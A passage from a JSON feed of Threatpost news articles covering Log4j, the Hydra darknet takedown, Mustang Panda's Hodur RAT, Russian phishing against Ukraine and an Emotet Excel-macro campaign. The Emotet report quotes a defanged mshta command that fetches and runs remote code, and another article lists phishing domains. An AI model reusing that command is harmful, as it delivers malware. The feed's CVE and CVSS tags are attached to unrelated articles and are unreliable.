scenario.\u201d\n\n\u201cThe combination of log4j\u2019s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult, and the fact that the exploit itself fits into a tweet,\u201d he told Threatpost on Friday via email.\n\nFirst things first, he said, \u201cstop what you\u2019re doing as a software shop and enumerate where log4j exists and might exist in your environment and products.\u201d\n\nHe noted that it\u2019s the kind of software \u201cthat can quite easily be there without making its presence obvious, so we expect the tail of exploitability on this vulnerability to be quite long.\u201d\n\nTim Wade, technical director of the CTO team at Vectra, told Threatpost that the specifics of how attacks will play out are \u201cstill a bit open-ended.\u201d But given the widespread use and position of the underlying software, he said, \u201cit absolutely looks like a good candidate for malicious network ingress, which means network defenders should be on guard for suspicious outbound traffic that may indicate command-and-control.\u201d\n\nWade said this is an example of how critical effective detection and response capabilities are, and \u201creally exposes how risky the \u2018prevent, patch, and pray\u2019 strategy that\u2019s so widely adopted in legacy security programs really is.\u201d\n\nJohn Bambenek, principal threat hunter at Netenrich, said that mitigations should be applied ASAP, including updating Java. He told Threatpost that Web application firewalls should also be updated with an appropriate rule to block such attacks.\n\n121021 15:57 UPDATE: Added input from John Hammond, John Bambenek, Tim Wade and Casey Ellis.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T17:58:04", "type": "threatpost", "title": "Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T17:58:04", "id": "THREATPOST:D098942E4435832E619282E1B92C9E0F", "href": "https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:44", "description": "\n\n(Brought to you by Uptycs. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nApplications are cybercriminals\u2019 favorite ways to crack open targeted organizations.\n\nYet no single team or process can assure the rollout of safe cloud applications. From code design to unit testing to deployment, teams and tools have to work together to detect risks early while keeping the pipeline of digital products moving.\n\nAlex Rice, CTO at HackerOne and Johnathan Hunt, VP of Security at GitLab, help development teams evolve their processes to build security directly into their workflows for smooth and safe cloud app rollouts.\n\nThey dropped by the Threatpost podcast recently to share tips on [DevSecOps](<https://threatpost.com/apps-built-better-devsecops-security-silver-bullet/167793/>), including:\n\n * How to build a continual testing, monitoring, and feedback processes to drive down application risk.\n * Developing a continuous approach to application security and DevOps security tools.\n * Why collaboration and continual feedback is essential across development, cloud and security teams.\n\n\u2026as well as how to deal with the boatload of animosity between development and security teams. One tip: Assume positive intent!\n\nHeads-up: Along with Aron Eidleman, Partner Solutions Architect at AWS, Alex and Johnathan will be participating in a joint[ webinar](<https://www.hackerone.com/events/mitigate-risk-cloud-ethical-hackers-and-devops?utm_source=gitlab&utm_medium=partner&utm_campaign=social-mitigate-risk-cloud-with-hackers-devops>) on Feb. 23 to discuss the importance of layering security practices into your DevOps workflows.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/021422_GitLab_HackerOne_Mixdown_1.mp3>). For more podcasts, check out[ Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:00:14", "type": "threatpost", "title": "Kill Cloud Risk: Get Everybody to Stop Fighting Over App Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:00:14", "id": "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "href": "https://threatpost.com/killing-cloud-risk-bulletproofing-app-security-podcast/178486/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:57:25", "description": "German authorities have taken down the Hydra marketplace \u2013 a popular destination on the Dark Web for trading in illicit goods and services, including cyberattack tools and stolen data.\n\nThis week, they were able to commandeer and take offline underpinning infrastructure such as servers, plus install a takedown banner in place of a working website, all while seizing $25 million (\u20ac23 million) in funds in the process.\n\n\u201cThe illegal marketplace was a Russian-language Darknet platform that had been accessible via the Tor network since at least 2015,\u201d according to a [Tuesday statement](<https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2022/Presse2022/220405_PM_IllegalerDarknetMarktplatz.html>) from Frankfurt\u2019s public prosecutor (ZIT) and Germany\u2019s Federal Criminal Police Office (BKA). \u201cTheir focus was on trading in illegal narcotics. In addition, data spied out worldwide, forged documents and digital services were offered profitably via the platform.\u201d\n\nSecurity firm Elliptic said that it confirmed the seizure, which occurred on April 5 in a series of 88 transactions amounting to 543.3 BTC, according to [a post](<https://www.elliptic.co/blog/5-billion-darknet-market-hydra-seized-by-german-authorities>) about the Hydra crackdown on Tuesday. It also said that since its inception, Hydra has pulled in around $5 billion in Bitcoin.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/04/05135041/hydra-1-e1649181164284.png>)\n\nThe banner that site visitors now see. Source: BKA.\n\nThe takedown operation has been in motion since last August, according to the notice, and included cooperation from American authorities. The investigation found that Hydra had 17 million customer accounts and boasted more than 19,000 registered sellers, with a global turnover of $1.34 billion (\u20ac1.23 billion) just in 2020. alone. Finding that information was not easy, the agencies noted.\n\n\u201cIn particular, the Bitcoin Bank Mixer, a service for obfuscating digital transactions provided by the platform, made crypto-investigations extremely difficult for law enforcement agencies,\u201d the posting noted. In the end they discovered that \u201cHydra\u2026was probably the illegal marketplace with the highest turnover worldwide.\u201d\n\nProsecutors are charging Hydra operators and administrators with charges of: commercially operating a criminal trading platform on the internet; the commercial procurement or granting of an opportunity for the unauthorized purchase or the unauthorized sale of narcotics; and commercial money laundering.\n\n## **Cracking Down on Illegal Dark Markets**\n\nGiven their status as linchpins of the [Dark Web underground economy](<https://threatpost.com/inside-ransomware-economy/166471/>) for cybercriminals and narcotics traders alike, international authorities have continued to put effort into dismantling underground markets.\n\nOne of the earliest wins was the [dismantling of Joker\u2019s Stash](<https://threatpost.com/jokers-stash-carding-site-taken-down/162548/>) in late 2020. It was a popular cybercriminal destination that specialized in trading in payment-card data, offering millions of stolen credit and debit cards to buyers. Anyone purchasing the information can create cloned cards to physically use at ATMs or at in-store machines that aren\u2019t chip-enabled; or, they can simply use the information to buy things online. Law enforcement managed to disable its blockchain DNS sites as well as Tor addresses.\n\nThen last year, Europol [announced the takedown](<https://threatpost.com/europol-dismantling-underground-marketplace/162949/>) of DarkMarket, which according to the law enforcement agency was \u201cthe world\u2019s largest illegal marketplace on the Dark Web.\u201d\n\nDarkMarket served as a marketplace for cybercriminals to buy and sell drugs, counterfeit money, stolen or counterfeit credit card data, anonymous SIM cards and malware. According to Europol, DarkMarket had almost 500,000 users and more than 2,400 sellers at the time of closure.\n\nIn addition, \u201cseveral darknet services have also voluntarily closed down over the winter of 2021-22,\u201d according Elliptic.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T17:53:47", "type": "threatpost", "title": "Authorities Fully Behead Hydra Dark Marketplace", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-05T17:53:47", "id": "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "href": "https://threatpost.com/authorities-hydra-dark-marketplace/179240/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:33", "description": "The Chinese advanced persistent threat (APT) Mustang Panda (a.k.a. Temp.Hex, HoneyMyte, TA416 or RedDelta) has upgraded its espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) \u2013 largely in and around Southeast Asia.\n\nFor one thing, the APT has deployed a brand-new, customized variant of an old but powerful remote-access tool (RAT) called PlugX (aka Korplug), according to researchers from ESET. They named this latest variant \u201cHodur,\u201d after a blind [Norse god](<https://en.wikipedia.org/wiki/H%C3%B6%C3%B0r>) known for slaying his thought-to-be-invulnerable half-brother Baldr.\n\nBeyond that, Mustang Panda has developed a complex array of tactics, techniques and procedures (TTPs) to maximize the efficacy of its attacks.\n\nESET researchers noted, \u201cEvery stage of the deployment process utilizes anti-analysis techniques and control-flow obfuscation.\u201d\n\nThe cyberespionage campaign dates back to at least last August and is still ongoing, according to ESET, and is targeting mainly governments and NGOs. Most victims are located in East and Southeast Asia, but there are outliers in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan).\n\nThe attacks begin with social-engineering emails or watering-hole attacks, researchers said.\n\n\u201cThe compromise chain includes decoy documents that are frequently updated and relate to events in Europe [and the war in Ukraine],\u201d noted the team, in a [Wednesday posting](<https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/>). \u201cOne of the filenames related to this campaign is \u201cSituation at the EU borders with Ukraine.exe.\u201d\n\nOther phishing lures mention updated COVID-19 travel restrictions, an approved regional aid map for Greece, and a Regulation of the European Parliament and of the Council.\n\n\u201cThe final lure is a real document available on the European Council\u2019s website,\u201d according to ESET. \u201cThis shows that the APT group behind this campaign is following current affairs and is able to successfully and swiftly react to them.\u201d\n\n## What is Hodur?\n\nHodur derives [from PlugX](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/#:~:text=PlugX%20was%20first%20identified%20in,the%20infected%20system%3B%20and%20more.>), a RAT that \u201callows remote users to perform data theft or take control of the affected systems without permission or authorization. It can copy, move, rename, execute and delete files; log keystrokes; fingerprint the infected system; and more.\u201d\n\nPlugX is one of the oldest malware families around, having existed in some form or another since 2008, with a rise in popularity in the [mid-2010s](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>). Malware that old won\u2019t cut it these days, which is why Mustang Panda has constantly [iterated](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) on it. Even just a few weeks ago, researchers from Proofpoint [discovered](<https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european>) an upgrade \u201cchanging its encoding method and expanding its configuration capabilities.\u201d\n\nAccording to ESET, the new variant \u201cmostly lines up with other Korplug variants, with some additional commands and characteristics.\u201d It for instance closely resembles another Norse-themed variant \u2013 Thor \u2013 [discovered](<https://unit42.paloaltonetworks.com/thor-plugx-variant/>) in 2020.\n\n## Sophisticated Attack Chain\n\nHodur itself is hardly the star of the show: Mustang Panda\u2019s campaign features literally dozens of TTPs designed to establish persistence, collect data and evade defenses.\n\nAs mentioned, the campaign begins simply, as the group uses current events to phish their targets. For example, last month, Proofpoint discovered it puppeteering a NATO diplomat\u2019s email address to send out .ZIP and .EXE files titled \u201cSituation at the EU borders with Ukraine.\u201d\n\nIf a target falls for the bait, a legitimate, validly signed, executable vulnerable to DLL search-order hijacking, a malicious DLL, and an encrypted Hodur file are deployed on the target machine.\n\n\u201cThe executable is abused to load the module, which then decrypts and executes the\u2026RAT,\u201d explained researchers. \u201cIn some cases, a downloader is used first to deploy these files along with a decoy document.\u201d\n\nMustang Panda\u2019s campaigns then frequently use custom loaders for shared malware including Cobalt Strike, Poison Ivy, and now, Hodur. Then things get interesting. ESET analysts tallied a total of 44 MITRE ATT&amp;CK techniques deployed in this campaign. Most interesting are the 13 different methods of obfuscating or otherwise evading cybersecurity tools and detection.\n\nFor example, the ESET blog noted that \u201cdirectories created during the installation process are set as hidden system directories,\u201d and \u201cfile and directory names match expected values for the legitimate app that is abused by the loader.\u201d\n\nAnd, the malware gaslights you because \u201cscheduled tasks created for persistence use legitimate-looking names,\u201d and \u201cwhen writing to a file, Korplug sets the file\u2019s timestamps to their previous values.\u201d\n\n## **Who\u2019s Behind Mustang Panda?**\n\nCybersecurity analysts have been tracking Mustang Panda [since 2017](<https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda>), when they first started using Mongolian-themed phishing tactics to conduct espionage on targets in Southeast Asia. Still, there\u2019s much we don\u2019t know about the group.\n\nThe depth and complexity of their TTPs puts Mustang Panda more in the company of state-sponsored groups than criminal ones. So \u201cit is possible, though unproven, that they are state-sponsored or at least state-sanctioned,\u201d wrote Mike Parkin, senior technical engineer at Vulcan Cyber, via email.\n\nHistorically, the group has kept to Southeast Asia, with one notable exception \u2013 [the Vatican](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) \u2013 in 2020. The vast majority of targets in ongoing campaigns have, indeed, been located in Mongolia and Vietnam, followed closely by Myanmar. However, as mentioned, the list also includes select entities in Europe and Africa, which muddies the picture a bit.\n\n\u201cThe target distribution is interesting,\u201d Parkin concluded. \u201cThere isn\u2019t enough information publicly available here to determine the attacker\u2019s ultimate agenda.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T14:08:06", "type": "threatpost", "title": "Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T14:08:06", "id": "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "href": "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there have been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T13:47:16", "description": "The infamous Emotet malware has switched tactics yet again, in an email campaign propagating through malicious Excel files, researchers have found.\n\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware, which is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious work, they [wrote in a report](<https://unit42.paloaltonetworks.com/new-emotet-infection-method/>) published online Tuesday.\n\n\u201cEmotet\u2019s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,\u201d Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.\n\nThe new attack vector\u2014discovered on Dec. 21 and still active\u2013delivers an Excel file that includes an obfuscated Excel 4.0 macro through socially engineered emails.\n\n\u201cWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload,\u201d researchers wrote.\n\n## **The Malware That Won\u2019t Die**\n\nEmotet started life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, at one point existing as a botnet that held more than 1.5 million machines under its control, according to Check Point Software. Typical consequences of TrickBot infections are bank-account takeover, high-value wire fraud and ransomware attacks.\n\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion dollars, researchers have said.\n\nThen, Emotet appeared to be [put out of commission](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. However, it resurfaced [last November](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) on the back of frequent partner-in-crime [TrickBot](<https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/>) \u2014 and now continues to [be a threat.](<https://threatpost.com/emotets-behavior-spread-are-omens-of-ransomware-attacks/176845/>)\n\nSince its return, Emotet has used [thread hijacking](<https://threatpost.com/emotet-returns-100k-mailboxes/162584/>) and other types of tactics as part of novel attack methods..\n\n\u201cThis technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts previously infected with Emotet,\u201d Unit 42 researchers wrote. \u201cThe botnet uses this stolen email data to create fake replies impersonating the original senders.\u201d\n\nExamples of this method included using links to install a fake Adobe Windows App Installer Package that were [reported](<https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/>) in December, researchers wrote.\n\n## **Using Excel Macros**\n\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\n\n\u201cIn some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,\u201d researchers explained. \u201cIn other cases, Emotet uses an Excel spreadsheet directly attached to the email.\u201d\n\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021. The email uses a lure heralding a \u201cnew announcement\u201d to a \u201cvaluable supplier\u201d and contains an encrypted .ZIP file in an attempt to bypass security systems, researchers wrote. It also includes the password to the .ZIP file in the email, so the victim can extract its contents.\n\n\u201cThe encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,\u201d researchers wrote \u201cThese macros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows host before the malicious content is activated.\u201d\n\nOnce that\u2019s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a remote HTML application that downloads and executes additional PowerShell code, researchers wrote.\n\n\u201cThe code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,\u201d they explained. \u201cThe deobfuscated command string that is executed is: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.\u201d\n\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\n\n\u201cThis second-stage PowerShell code\u2026contains 14 URLs to retrieve the Emotet binary,\u201d researchers wrote. \u201cThe script attempts each URL until an Emotet binary is successfully downloaded.\u201d\n\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is taken down, researchers said. The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted PE from its resource section, they added.\n\n## **Microsoft to Block Macros by Default**\n\nLast week, Microsoft [announced a plan](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) to disable all macros by default in some applications, acknowledging that the mechanism is one of the world\u2019s most popular ways to deliver malware.\n\n\u201cFor the protection of our customers, we need to make it more difficult to enable 